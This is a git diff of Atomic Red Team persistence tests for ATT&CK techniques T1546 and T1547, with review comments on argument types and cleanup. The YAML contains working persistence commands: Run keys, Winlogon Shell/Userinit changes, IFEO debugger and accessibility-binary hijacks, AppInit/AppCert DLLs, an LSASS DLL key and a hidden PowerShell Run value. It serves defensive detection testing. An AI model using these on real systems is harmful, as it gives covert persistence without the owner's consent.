File Extension To Revert - type: String - default: htafile + description: File Extension To Revert + type: string + default: htafile executor: command: | assoc #{extension_to_change}=#{target_extension_handler} cleanup_command: | assoc #{extension_to_change}=#{original_extension_handler} - + name: command_prompt - elevation_required: true \ No newline at end of file + elevation_required: true 
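Review bot: `target_extension_handler` in the T1546.001 hunk is typed `path`, but its default `txtfile` and the `assoc #{extension_to_change}=#{target_extension_handler}` that consumes it treat it as a file-type name, not a filesystem path; `type: string` is the accurate type. The same mismatch is in the T1547.001 SystemBC hunk further down, where `reg_key_value` is `type: path` with a default that is a command line (`powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File`). Since this commit touches every `type:` line, it is the natural place to correct the few whose value was wrong before the case change, not just its case. The `#Adding additional input arguement below ...` comment in the same hunk misspells `argument`.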
diff --git a/atomics/T1546.002/T1546.002.yaml b/atomics/T1546.002/T1546.002.yaml
index 62d483bf..90a74480 100644
--- a/atomics/T1546.002/T1546.002.yaml
+++ b/atomics/T1546.002/T1546.002.yaml
@@ -10,11 +10,11 @@ atomic_tests:
 input_arguments:
 input_binary:
 description: Executable binary to use in place of screensaver for persistence
- type: Path
+ type: path
 default: C:\Windows\System32\cmd.exe
 reboot:
 description: Set to non-zero value if you want the test to reboot the system so that changes take effect
- type: Integer
+ type: integer
 default: 0
 executor:
 command: |
diff --git a/atomics/T1546.003/T1546.003.yaml b/atomics/T1546.003/T1546.003.yaml
index 4ac3b12a..e57748e3 100644
--- a/atomics/T1546.003/T1546.003.yaml
+++ b/atomics/T1546.003/T1546.003.yaml
@@ -95,11 +95,11 @@ atomic_tests:
 input_arguments:
 mofcomp_path:
 description: Location of mofcomp.exe
- type: String
+ type: string
 default: c:\windows\system32\wbem\mofcomp.exe
 mof_file:
 description: Local location MOF file
- type: String
+ type: string
 default: PathToAtomicsFolder\T1546.003\src\T1546.003.mof
 dependency_executor_name: powershell
 dependencies:
@@ -126,4 +126,4 @@ atomic_tests:
 $FilterConsumerBindingToCleanup | Remove-WmiObject
 $EventConsumerToCleanup | Remove-WmiObject
 $EventFilterToCleanup | Remove-WmiObject
- name: powershell
\ No newline at end of file
+ name: powershell
diff --git a/atomics/T1546.004/T1546.004.yaml b/atomics/T1546.004/T1546.004.yaml
index 8ea1c9a6..fee325e0 100644
--- a/atomics/T1546.004/T1546.004.yaml
+++ b/atomics/T1546.004/T1546.004.yaml
@@ -11,7 +11,7 @@ atomic_tests:
 input_arguments:
 command_to_add:
 description: Command to add to the .bash_profile file
- type: String
+ type: string
 default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004
 executor:
 command: |
@@ -30,7 +30,7 @@ atomic_tests: input_arguments: command_to_add: description: Command to add to the .bashrc file - type: String + type: string default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004 executor: command: | @@ -48,7 +48,7 @@ atomic_tests: input_arguments: text_to_append: description: Text to append to the /etc/profile file - type: String + type: string default: "# Hello from Atomic Red Team T1546.004" executor: elevation_required: true @@ -66,7 +66,7 @@ atomic_tests: input_arguments: text_to_append: description: Text to append to the ~/.profile file - type: String + type: string default: "# Atomic Red Team was here... T1546.004" executor: elevation_required: false @@ -75,7 +75,7 @@ atomic_tests: echo '#{text_to_append}' >> ~/.profile cleanup_command: | sed -i "s/# Atomic Red Team was here... T1546.004//" ~/.profile -- name: System shell profile scripts +- name: System shell profile scripts auto_generated_guid: 8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4 description: | An adversary may wish to establish persistence by adding commands into any of the script files in the /etc/profile.d/ directory, which are executed every time "any" user logs in. @@ -84,7 +84,7 @@ atomic_tests: input_arguments: text_to_append: description: Text to append to the /etc/profile.d/bash_completion.sh file - type: String + type: string default: "# Atomic Red Team was here... T1546.004" executor: elevation_required: true diff --git a/atomics/T1546.007/T1546.007.yaml b/atomics/T1546.007/T1546.007.yaml index 6de21710..4144c45e 100644 --- a/atomics/T1546.007/T1546.007.yaml +++ b/atomics/T1546.007/T1546.007.yaml 
@@ -6,7 +6,7 @@ atomic_tests: description: | You can register a "helper dll" with Netsh as a persistance mechanism. The code in the dll is executed every time netsh.exe is called. The NetshHelper.dll provided with the atomic will simply launch notepad when netsh.exe is run. - + [Blog](https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html) [Sample DLL code](https://github.com/outflanknl/NetshHelperBeacon) supported_platforms: @@ -14,7 +14,7 @@ atomic_tests: input_arguments: helper_file: description: Path to DLL - type: Path + type: path default: PathToAtomicsFolder\T1546.007\bin\NetshHelper.dll dependency_executor_name: powershell dependencies: diff --git a/atomics/T1546.008/T1546.008.yaml b/atomics/T1546.008/T1546.008.yaml index c50a3c0e..29c314dc 100644 --- a/atomics/T1546.008/T1546.008.yaml +++ b/atomics/T1546.008/T1546.008.yaml @@ -12,12 +12,12 @@ atomic_tests: parent_list: description: | Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" - type: String + type: string default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe attached_process: description: | Full path to process to attach to target in #{parent_list}. Default: cmd.exe - type: Path + type: path default: C:\windows\system32\cmd.exe executor: command: | diff --git a/atomics/T1546.009/T1546.009.yaml b/atomics/T1546.009/T1546.009.yaml index 0fac23fe..2db9a495 100644 --- a/atomics/T1546.009/T1546.009.yaml +++ b/atomics/T1546.009/T1546.009.yaml @@ -7,7 +7,7 @@ atomic_tests: Creates a new 'AtomicTest' value pointing to an AppCert DLL in the AppCertDlls registry key. Once the computer restarted, the DLL will be loaded in multiple processes and write an 'AtomicTest.txt' file in C:\Users\Public\ to validate that the DLL executed succesfully. - + Reference: https://skanthak.homepage.t-online.de/appcert.html supported_platforms: 
@@ -15,7 +15,7 @@ atomic_tests: input_arguments: dll_path: description: path of dll to use - type: Path + type: path default: PathToAtomicsFolder\T1546.009\bin\AtomicTest.dll reboot: description: Set value to $true if you want to automatically reboot the machine @@ -23,13 +23,13 @@ atomic_tests: default: $false dependency_executor_name: powershell dependencies: - - description: | - File to copy must exist on disk at specified location (#{dll_path}) - prereq_command: | - if (Test-Path #{dll_path}) {exit 0} else {exit 1} - get_prereq_command: | - New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.009/bin/AtomicTest.dll" -OutFile "#{dll_path}" + - description: | + File to copy must exist on disk at specified location (#{dll_path}) + prereq_command: | + if (Test-Path #{dll_path}) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.009/bin/AtomicTest.dll" -OutFile "#{dll_path}" executor: command: | Copy-Item #{dll_path} C:\Users\Public\AtomicTest.dll -Force diff --git a/atomics/T1546.010/T1546.010.yaml b/atomics/T1546.010/T1546.010.yaml index f5e70f99..ab1f8266 100644 --- a/atomics/T1546.010/T1546.010.yaml +++ b/atomics/T1546.010/T1546.010.yaml 
@@ -8,18 +8,18 @@ atomic_tests: you will see the message "The operation completed successfully." Each time the DLL is loaded, you will see a message box with a message of "Install AppInit Shim DLL was called!" appear. This will happen regularly as your computer starts up various applications and may in fact drive you crazy. A reliable way to make the message box appear and verify the AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up. - + Note: If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls supported_platforms: - windows input_arguments: registry_file: description: Windows Registry File - type: Path + type: path default: PathToAtomicsFolder\T1546.010\src\T1546.010.reg registry_cleanup_file: description: Windows Registry File - type: Path + type: path default: PathToAtomicsFolder\T1546.010\src\T1546.010-cleanup.reg dependency_executor_name: powershell dependencies: diff --git a/atomics/T1546.011/T1546.011.yaml b/atomics/T1546.011/T1546.011.yaml index 86e3b425..adbb44e5 100644 --- a/atomics/T1546.011/T1546.011.yaml +++ b/atomics/T1546.011/T1546.011.yaml @@ -14,7 +14,7 @@ atomic_tests: input_arguments: file_path: description: Path to the shim database file - type: String + type: string default: PathToAtomicsFolder\T1546.011\bin\AtomicShimx86.sdb dependency_executor_name: powershell dependencies: @@ -75,4 +75,3 @@ atomic_tests: Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1546.011" -ErrorAction Ignore name: powershell elevation_required: true - diff --git a/atomics/T1546.012/T1546.012.yaml b/atomics/T1546.012/T1546.012.yaml index 5ede0615..4713fe49 100644 --- a/atomics/T1546.012/T1546.012.yaml +++ b/atomics/T1546.012/T1546.012.yaml 
@@ -10,11 +10,11 @@ atomic_tests:
 input_arguments:
 target_binary:
 description: Binary To Attach To
- type: Path
+ type: path
 default: calc.exe
 payload_binary:
 description: Binary To Execute
- type: Path
+ type: path
 default: C:\Windows\System32\cmd.exe
 executor:
 command: |
@@ -32,11 +32,11 @@ atomic_tests:
 input_arguments:
 target_binary:
 description: Binary To Attach To
- type: Path
+ type: path
 default: notepad.exe
 payload_binary:
 description: Binary To Execute
- type: Path
+ type: path
 default: C:\Windows\System32\cmd.exe
 executor:
 command: |
@@ -61,12 +61,12 @@ atomic_tests:
 process:
 description: |
 Process to monitor
- type: String
+ type: string
 default: whoami.exe
 cmd_to_run:
 description: |
 Command to execute
- type: String
+ type: string
 default: cmd.exe /c calc.exe
 executor:
 command: |
@@ -80,7 +80,7 @@ atomic_tests:
 $SilentProcessExit = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{process}"
 New-Item -Path $SilentProcessExit -Force
 New-ItemProperty -Path $SilentProcessExit -Name $Name -Value $Value -PropertyType DWord -Force
-
+
 $Name = "MonitorProcess"
 $Value = "#{cmd_to_run}"
 New-ItemProperty -Path $SilentProcessExit -Name $Name -Value $Value -PropertyType String -Force
@@ -91,4 +91,4 @@ atomic_tests:
 $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{process}"
 Remove-Item $registryPath -force
 name: powershell
- elevation_required: true
\ No newline at end of file
+ elevation_required: true
diff --git a/atomics/T1546.013/T1546.013.yaml b/atomics/T1546.013/T1546.013.yaml
index 1b8cbfed..30756cfd 100644
--- a/atomics/T1546.013/T1546.013.yaml
+++ b/atomics/T1546.013/T1546.013.yaml
@@ -10,11 +10,11 @@ atomic_tests:
 input_arguments:
 exe_path:
 description: Path the malicious executable
- type: Path
+ type: path
 default: calc.exe
 ps_profile:
 description: Powershell profile to use
- type: String
+ type: string
 default: $profile
 dependency_executor_name: powershell
 dependencies:
@@ -32,4 +32,4 @@ atomic_tests: cleanup_command: | $oldprofile = cat $profile | Select-Object -skiplast 1 Set-Content $profile -Value $oldprofile - name: powershell \ No newline at end of file + name: powershell diff --git a/atomics/T1546.014/T1546.014.yaml b/atomics/T1546.014/T1546.014.yaml index 5b3a5c64..65924d22 100644 --- a/atomics/T1546.014/T1546.014.yaml +++ b/atomics/T1546.014/T1546.014.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: plist: description: Path to attacker emond plist file - type: Path + type: path default: PathToAtomicsFolder/T1546.014/src/T1546.014_emond.plist executor: command: | diff --git a/atomics/T1546.015/T1546.015.yaml b/atomics/T1546.015/T1546.015.yaml index 0563e067..158c8e48 100644 --- a/atomics/T1546.015/T1546.015.yaml +++ b/atomics/T1546.015/T1546.015.yaml @@ -16,7 +16,7 @@ atomic_tests: default: Apartment dllpath: description: Path to the DLL. - type: String + type: string default: $env:TEMP\AtomicTest.dll clsid: description: Class ID to hijack. @@ -42,9 +42,9 @@ atomic_tests: name: powershell - name: Powershell Execute COM Object auto_generated_guid: 752191b1-7c71-445c-9dbe-21bb031b18eb - description: |- - Use the PowerShell to execute COM CLSID object. - Reference: https://pentestlab.blog/2020/05/20/persistence-com-hijacking/ + description: |- + Use the PowerShell to execute COM CLSID object. + Reference: https://pentestlab.blog/2020/05/20/persistence-com-hijacking/ supported_platforms: - windows executor: @@ -71,7 +71,7 @@ atomic_tests: default: Both dll_path: description: Path to the DLL. - type: String + type: string default: $env:temp\T1546.015_calc.dll clsid: description: Class ID to hijack. diff --git a/atomics/T1546/T1546.yaml b/atomics/T1546/T1546.yaml index 09e69b46..aaa6fd16 100644 --- a/atomics/T1546/T1546.yaml +++ b/atomics/T1546/T1546.yaml 
@@ -6,7 +6,7 @@ atomic_tests: auto_generated_guid: aca9ae16-7425-4b6d-8c30-cad306fdbd5b description: | The DLL pointed to by the AutodialDLL registry key is loaded every time a process connects to the internet. Attackers can gain persistent code execution by setting this key to a DLL of their choice. - + The sample dll provided, AltWinSock2DLL, will launch the notepad process. Starting and stopping a web browser such as MS Edge or Chrome should result in the dll executing. [Blog](https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/) supported_platforms: @@ -28,7 +28,7 @@ atomic_tests: elevation_required: true - name: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) auto_generated_guid: a574dafe-a903-4cce-9701-14040f4f3532 - description: |- + description: |- An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed. [reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433) supported_platforms: @@ -39,7 +39,7 @@ atomic_tests: type: string default: notepad.exe executor: - command: |- + command: |- New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -Value "#{command}" -PropertyType "String" cleanup_command: |- Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore @@ -47,7 +47,7 @@ atomic_tests: elevation_required: true - name: HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) auto_generated_guid: 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01 - description: |- + description: |- An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed. [reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433) supported_platforms: 
@@ -58,7 +58,7 @@ atomic_tests: type: string default: notepad.exe executor: - command: |- + command: |- $path = "HKCU:\Software\Microsoft\Command Processor" if (!(Test-Path -path $path)){ New-Item -ItemType Key -Path $path diff --git a/atomics/T1547.001/T1547.001.yaml b/atomics/T1547.001/T1547.001.yaml index 6ae087f9..696b3681 100644 --- a/atomics/T1547.001/T1547.001.yaml +++ b/atomics/T1547.001/T1547.001.yaml @@ -12,7 +12,7 @@ atomic_tests: input_arguments: command_to_execute: description: Thing to Run - type: Path + type: path default: C:\Path\AtomicRedTeam.exe executor: command: | @@ -31,7 +31,7 @@ atomic_tests: input_arguments: thing_to_execute: description: Thing to Run - type: Path + type: path default: C:\Path\AtomicRedTeam.dll executor: command: | @@ -50,11 +50,11 @@ atomic_tests: input_arguments: thing_to_execute: description: Thing to Run - type: Path + type: path default: powershell.exe reg_key_path: description: Path to registry key to update - type: Path + type: path default: HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce executor: command: | @@ -122,7 +122,7 @@ atomic_tests: Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" -ErrorAction Ignore name: powershell elevation_required: true - + - name: Add Executable Shortcut Link to User Startup Folder auto_generated_guid: 24e55612-85f6-4bd6-ae74-a73d02e3441d description: 'Adds a non-malicious executable shortcut link to the current users startup directory. Test can be verified by going to the users startup directory and checking if the shortcut link exists. ' @@ -138,7 +138,7 @@ atomic_tests: $Create.Save() cleanup_command: Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore name: powershell - elevation_required: true + elevation_required: true - name: Add persistance via Recycle bin auto_generated_guid: bda6a3d6-7aa7-4e89-908b-306772e9662f 
@@ -148,25 +148,25 @@ atomic_tests: supported_platforms: - windows executor: - command: reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" /ve /d "calc.exe" /f + command: reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" /ve /d "calc.exe" /f cleanup_command: reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" /f name: command_prompt - name: SystemBC Malware-as-a-Service Registry auto_generated_guid: 9dc7767b-30c1-4cc4-b999-50cab5e27891 description: | - This Atomic will create a registry key called socks5_powershell for persistance access - https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c + This Atomic will create a registry key called socks5_powershell for persistance access + https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c supported_platforms: - windows input_arguments: reg_key_value: description: Thing to Run - type: Path + type: path default: powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File reg_key_path: description: Path to registry key to update - type: Path + type: path default: HKCU:\Software\Microsoft\Windows\CurrentVersion\Run executor: command: | @@ -175,7 +175,7 @@ atomic_tests: cleanup_command: | Remove-ItemProperty -Path #{reg_key_path} -Name "socks5_powershell" -Force -ErrorAction Ignore name: powershell - + - name: Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value auto_generated_guid: acfef903-7662-447e-a391-9c91c2f00f7b description: | @@ -186,11 +186,11 @@ atomic_tests: input_arguments: new_startup_folder: description: new startup folder to replace standard one - type: String + type: string default: $env:TMP\atomictest\ payload: description: 'executable to be placed in new startup location ' - type: String + type: string default: C:\Windows\System32\calc.exe executor: command: | 
@@ -205,7 +205,7 @@ atomic_tests: - name: Change Startup Folder - HKCU Modify User Shell Folders Startup Value auto_generated_guid: 8834b65a-f808-4ece-ad7e-2acdf647aafa - description: | + description: | This test will modify the HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders -V "Startup" value to point to a new startup folder where a payload could be stored to launch at boot. *successful execution requires system restart supported_platforms: 
@@ -213,25 +213,25 @@ atomic_tests: input_arguments: new_startup_folder: description: new startup folder to replace standard one - type: String + type: string default: $env:TMP\atomictest\ payload: description: 'executable to be placed in new startup location ' - type: String + type: string default: C:\Windows\System32\calc.exe executor: - command: | - New-Item -ItemType Directory -path "#{new_startup_folder}" - Copy-Item -path "#{payload}" -destination "#{new_startup_folder}" - Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "#{new_startup_folder}" + command: | + New-Item -ItemType Directory -path "#{new_startup_folder}" + Copy-Item -path "#{payload}" -destination "#{new_startup_folder}" + Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "#{new_startup_folder}" cleanup_command: | - Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" - Remove-Item "#{new_startup_folder}" -Recurse -Force + Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" + Remove-Item "#{new_startup_folder}" -Recurse -Force name: powershell - name: HKCU - Policy Settings Explorer Run Key auto_generated_guid: a70faea1-e206-4f6f-8d9a-67379be8f6f1 - description: | + description: | This test will create a new value under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run to launch calc.exe on boot. *Requires reboot supported_platforms: @@ -243,7 +243,7 @@ atomic_tests: default: atomictest payload: description: 'payload to execute' - type: String + type: string default: C:\Windows\System32\calc.exe executor: command: | 
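Review bot: The re-indented `cleanup_command` in the HKCU "User Shell Folders" hunk (`@@ -213,25 +213,25 @@`) restores `Startup` to a hard-coded, already-expanded path (`$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup`) rather than to the value present before the test; on a stock profile that value is `%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup` stored as REG_EXPAND_SZ, so after cleanup the data and quite possibly the value kind differ from the original. Either restore that default explicitly, `Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value '%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' -Type ExpandString`, or have `command:` write the current value to a file that `cleanup_command:` reads back. I am not certain Set-ItemProperty keeps the existing kind when `-Type` is omitted, which is one more reason to state it. The HKLM "Common Startup" variant earlier on the page has the same shape, but its command lines are outside the visible hunk.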
@@ -257,7 +257,7 @@ atomic_tests: - name: HKLM - Policy Settings Explorer Run Key auto_generated_guid: b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f - description: | + description: | This test will create a HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run key value to launch calc.exe on boot. *Requires reboot supported_platforms: @@ -269,7 +269,7 @@ atomic_tests: default: atomictest payload: description: 'payload to execute' - type: String + type: string default: C:\Windows\System32\calc.exe executor: command: | @@ -283,7 +283,7 @@ atomic_tests: - name: HKLM - Append Command to Winlogon Userinit KEY Value auto_generated_guid: f7fab6cc-8ece-4ca7-a0f1-30a22fccd374 - description: | + description: | This test will append a command to the HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit value to launch calc.exe on boot. * Requires reboot supported_platforms: @@ -291,7 +291,7 @@ atomic_tests: input_arguments: payload: description: what to run - type: String + type: string default: C:\Windows\System32\calc.exe executor: command: | @@ -308,7 +308,7 @@ atomic_tests: - name: 'HKLM - Modify default System Shell - Winlogon Shell KEY Value ' auto_generated_guid: 1d958c61-09c6-4d9e-b26b-4130314e520e - description: | + description: | This test change the default value of HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell from "explorer.exe" to the full path of "C:\Windows\explorer.exe" to log a change to the key's default value without breaking boot sequence. An atacker will alternatively replace this with a custom shell. @@ -317,7 +317,7 @@ atomic_tests: input_arguments: payload: description: what to run - type: String + type: string default: C:\Windows\explorer.exe executor: command: | 
@@ -333,7 +333,7 @@ atomic_tests:
 elevation_required: true
 - name: secedit used to create a Run key in the HKLM Hive
 auto_generated_guid: 14fdc3f1-6fc3-4556-8d36-aa89d9d42d02
- description: |
+ description: |
 secedit allows to manipulate the HKLM hive of the Windows registry. This test creates a Run key with the keyname calc having calc.exe as the value in the HKLM hive.
 [Reference](https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d)
 supported_platforms:
@@ -341,7 +341,7 @@ atomic_tests:
 input_arguments:
 ini_file:
 description: INI config template
- type: String
+ type: string
 default: $PathToAtomicsFolder\T1547.001\src\regtemplate.ini
 secedit_db:
 description: Custom secedit db
diff --git a/atomics/T1547.004/T1547.004.yaml b/atomics/T1547.004/T1547.004.yaml
index 79757b40..a4a6ee97 100644
--- a/atomics/T1547.004/T1547.004.yaml
+++ b/atomics/T1547.004/T1547.004.yaml
@@ -13,7 +13,7 @@ atomic_tests:
 input_arguments:
 binary_to_execute:
 description: Path of binary to execute
- type: Path
+ type: path
 default: C:\Windows\System32\cmd.exe
 executor:
 command: |
@@ -21,7 +21,7 @@ atomic_tests:
 cleanup_command: |
 Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
 name: powershell
-
+
 - name: Winlogon Userinit Key Persistence - PowerShell
 auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb
 description: |
@@ -33,7 +33,7 @@ atomic_tests:
 input_arguments:
 binary_to_execute:
 description: Path of binary to execute
- type: Path
+ type: path
 default: C:\Windows\System32\cmd.exe
 executor:
 command: |
@@ -53,7 +53,7 @@ atomic_tests:
 input_arguments:
 binary_to_execute:
 description: Path of notification package to execute
- type: Path
+ type: path
 default: C:\Windows\Temp\atomicNotificationPackage.dll
 executor:
 command: |
@@ -74,7 +74,7 @@ atomic_tests: input_arguments: binary_to_execute: description: Path of binary to execute - type: Path + type: path default: C:\Windows\System32\cmd.exe executor: command: | @@ -82,7 +82,7 @@ atomic_tests: cleanup_command: | Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore name: powershell - + - name: Winlogon HKLM Userinit Key Persistence - PowerShell auto_generated_guid: f9b8daff-8fa7-4e6a-a1a7-7c14675a545b description: | @@ -94,7 +94,7 @@ atomic_tests: input_arguments: binary_to_execute: description: Path of binary to execute - type: Path + type: path default: C:\Windows\System32\cmd.exe executor: command: | diff --git a/atomics/T1547.005/T1547.005.yaml b/atomics/T1547.005/T1547.005.yaml index 2efa415b..00c0ac3a 100644 --- a/atomics/T1547.005/T1547.005.yaml +++ b/atomics/T1547.005/T1547.005.yaml @@ -9,7 +9,7 @@ atomic_tests: input_arguments: fake_ssp_dll: description: Value added to registry key. Normally refers to a DLL name in C:\Windows\System32. - type: String + type: string default: not-a-ssp executor: command: | @@ -22,4 +22,4 @@ atomic_tests: # revert (before reboot) Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages name: powershell - elevation_required: true \ No newline at end of file + elevation_required: true diff --git a/atomics/T1547.006/T1547.006.yaml b/atomics/T1547.006/T1547.006.yaml index 4c9ddd28..f6809254 100644 --- a/atomics/T1547.006/T1547.006.yaml +++ b/atomics/T1547.006/T1547.006.yaml 
@@ -10,19 +10,19 @@ atomic_tests: input_arguments: module_name: description: Name of the kernel module name. - type: String + type: string default: T1547006 module_path: description: Folder used to store the module. - type: Path + type: path default: /tmp/T1547.006/T1547006.ko temp_folder: description: Temp folder used to compile the code. - type: Path + type: path default: /tmp/T1547.006 module_source_path: description: Path to download Gsecdump binary file - type: Url + type: url default: PathToAtomicsFolder/T1547.006/src dependency_executor_name: bash dependencies: @@ -52,7 +52,7 @@ atomic_tests: input_arguments: module_path: description: Folder used to store the module. - type: Path + type: path default: /Library/Extensions/SoftRAID.kext dependency_executor_name: bash dependencies: @@ -83,11 +83,11 @@ atomic_tests: input_arguments: src_path: description: Folder used to store the module. - type: Path + type: path default: PathToAtomicsFolder/T1547.006/src/macos_kextload.c exe_path: description: Folder used to store the module. - type: Path + type: path default: /tmp/T1547006_iokit_loader dependency_executor_name: bash dependencies: diff --git a/atomics/T1547.007/T1547.007.yaml b/atomics/T1547.007/T1547.007.yaml index 2c8af95e..3a6f4ae1 100644 --- a/atomics/T1547.007/T1547.007.yaml +++ b/atomics/T1547.007/T1547.007.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: calc_plist_path: description: path to binary plist with entry to open calculator - type: Path + type: path default: PathToAtomicsFolder/T1547.007/src/reopen_loginwindow_calc.plist executor: command: | @@ -29,7 +29,7 @@ atomic_tests: input_arguments: script: description: path to script - type: Path + type: path default: /path/to/script executor: command: | 
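Review bot: `module_source_path` in the @@ -10,19 hunk is typed `url` and described as "Path to download Gsecdump binary file", yet its default `PathToAtomicsFolder/T1547.006/src` is a local directory holding this technique's module source; the description looks copied from an unrelated test and the type does not match the value. Suggest `description: Folder containing the kernel module source` and `type: path`, assuming the dependency commands (which continue past the end of the hunk) read it from disk. The @@ -83,11 hunk in the same file has the same copy-paste problem: `src_path` (default `.../macos_kextload.c`) and `exe_path` (default `/tmp/T1547006_iokit_loader`) are both described as "Folder used to store the module." although one is a C source file and the other a compiled binary.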
@@ -49,20 +49,20 @@ atomic_tests: input_arguments: objc_source_path: description: path to objective C program - type: Path + type: path default: PathToAtomicsFolder/T1547.007/src/append_reopen_loginwindow.m exe_path: description: path to compiled program - type: Path + type: path default: /tmp/t1547007_append_exe dependency_executor_name: bash dependencies: - - description: | - compile C program - prereq_command: | - if [ -f "#{exe_path}" ]; then exit 0 ; else exit 1; fi - get_prereq_command: | - cc #{objc_source_path} -o #{exe_path} -framework Cocoa + - description: | + compile C program + prereq_command: | + if [ -f "#{exe_path}" ]; then exit 0 ; else exit 1; fi + get_prereq_command: | + cc #{objc_source_path} -o #{exe_path} -framework Cocoa executor: command: | FILE=`find ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist -type f | head -1` diff --git a/atomics/T1547.008/T1547.008.yaml b/atomics/T1547.008/T1547.008.yaml index 9a1627b5..624a5d02 100644 --- a/atomics/T1547.008/T1547.008.yaml +++ b/atomics/T1547.008/T1547.008.yaml @@ -5,7 +5,7 @@ atomic_tests: auto_generated_guid: 8ecef16d-d289-46b4-917b-0dba6dc81cf1 description: | The following Atomic will modify an undocumented registry key that may be abused to load a arbitrary DLL into LSASS. - + Upon execution, the registry key will be modified and a value will contain the path to the DLL. Reference: https://blog.xpnsec.com/exploring-mimikatz-part-1/ and source https://github.com/oxfemale/LogonCredentialsSteal Note that if any LSA based protection is enabled, this will most likely not be successful with LSASS.exe loading the DLL. @@ -14,7 +14,7 @@ atomic_tests: input_arguments: dll_path: description: Module to be loaded into LSASS - type: Path + type: path default: '$env:TEMP\lsass_lib.dll' dependency_executor_name: powershell dependencies: diff --git a/atomics/T1547.009/T1547.009.yaml b/atomics/T1547.009/T1547.009.yaml index 57aaa6de..83b56c92 100644 --- a/atomics/T1547.009/T1547.009.yaml 
